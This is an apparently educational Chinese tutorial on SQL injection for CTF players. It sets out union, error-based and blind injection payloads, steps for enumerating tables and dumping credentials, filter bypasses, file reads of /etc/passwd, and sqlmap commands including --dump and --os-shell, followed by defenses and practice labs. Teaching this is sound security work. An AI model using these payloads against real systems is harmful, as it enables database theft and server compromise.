一、什么是SQL注入？

SQL注入是一种通过用户输入构造恶意SQL语句，干扰后端数据库查询逻辑的攻击方式。攻击者可通过注入获取敏感数据、篡改数据库或执行系统命令。

---

二、常见SQL注入类型

1. 联合查询注入（Union-Based）
   利用UNION SELECT拼接查询结果，直接回显数据。

   ' UNION SELECT username, password FROM users--

2. 报错注入（Error-Based）
   通过触发数据库报错泄露信息（如MySQL的updatexml或extractvalue）。

   ' AND updatexml(1, concat(0x7e, (SELECT user())), 1)--

3. 布尔盲注（Boolean-Based Blind）
   通过页面返回的真假状态推断数据（如返回内容差异或HTTP状态码）。

   ' AND (SELECT SUBSTR(password,1,1) FROM users WHERE id=1)='a'--

4. 时间盲注（Time-Based Blind）
   通过延时响应判断条件是否成立（如MySQL的sleep()）。

   ' AND IF(1=1, SLEEP(5), 0)--

---

三、手动注入步骤（以CTF题目为例）

1. 检测注入点

   • 输入单引号'触发数据库错误（如You have an error in your SQL syntax）。

   • 测试逻辑条件：

     id=1' AND 1=1-- （页面正常） id=1' AND 1=2-- （页面异常）

2. 确定字段数（ORDER BY）

   ' ORDER BY 3-- （无报错） ' ORDER BY 4-- （报错→字段数为3）

3. 联合查询获取数据

   ' UNION SELECT 1,2,3-- （确定回显位） ' UNION SELECT database(), user(), version()--

4. 提取表名与列名

   ' UNION SELECT 1, group_concat(table_name), 3 FROM information_schema.tables WHERE table_schema=database()-- ' UNION SELECT 1, group_concat(column_name), 3 FROM information_schema.columns WHERE table_name='users'--

5. 获取敏感数据

   ' UNION SELECT 1, username, password FROM users--

---

四、CTF实战技巧

1. 绕过过滤

   • 大小写绕过：UnIoN SeLeCt（部分过滤器不区分大小写）。
   • 注释符：-- （空格）、#、/*...*/。
   • 编码绕过：URL编码（%27代替'）、十六进制（0x...）。
   • 空格绕过：用/**/或+代替空格（如UNION/**/SELECT）。

2. 利用字符串拼接

   • MySQL：'||'1'='1' → ' OR '1'='1。
   • SQLite：'||1=1-- 。

3. 利用数据库特性

   • MySQL：LOAD_FILE('/etc/passwd')读取文件。
   • PostgreSQL：pg_read_file('/etc/passwd')。
   • SQLite：sqlite_version()获取版本。

---

五、自动化工具：SQLMap

1. 基本用法

   sqlmap -u "http://target.com/page?id=1" --dbs # 获取所有数据库名 sqlmap -u "http://target.com/page?id=1" -D dbname --tables # 获取表名 sqlmap -u "http://target.com/page?id=1" -D dbname -T users --dump # 导出数据

2. 高级参数

   • --level=3：提高检测等级（包含Cookie注入）。
   • --risk=3：允许高风险操作（如文件写入）。
   • --os-shell：尝试获取系统Shell（需高权限）。

---

六、防御措施

1. 参数化查询（预编译）

   Python

   # Python示例（使用SQLAlchemy） result = db.session.execute('SELECT * FROM users WHERE id = :id', {'id': user_id})

2. 输入过滤

   • 过滤特殊字符（' " ; --）。
   • 限制输入类型（如数字类型强制转换为整数）。

3. 最小权限原则

   • 数据库用户仅授予必要权限（禁止FILE、EXECUTE等）。

---

七、CTF例题

1. 题目：登录页面存在SQL注入，获取管理员密码。

   SQL

   ' OR 1=1 -- ' UNION SELECT null, password FROM users WHERE username='admin'--

2. 题目：过滤了空格和UNION，利用盲注获取数据。

   SQL

   '||(SELECT CASE WHEN (SUBSTR(password,1,1)='a') THEN SLEEP(5) ELSE 0 END FROM users)#

---

八、资源推荐

• 练习平台：
  • PortSwigger SQLi Labs（https://portswigger.net/web-security/sql-injection）
  • SQLi Labs（GitHub开源靶场）
• 深入阅读：
  • 《SQL注入攻击与防御（第2版）》
  • OWASP SQL Injection Cheat Sheet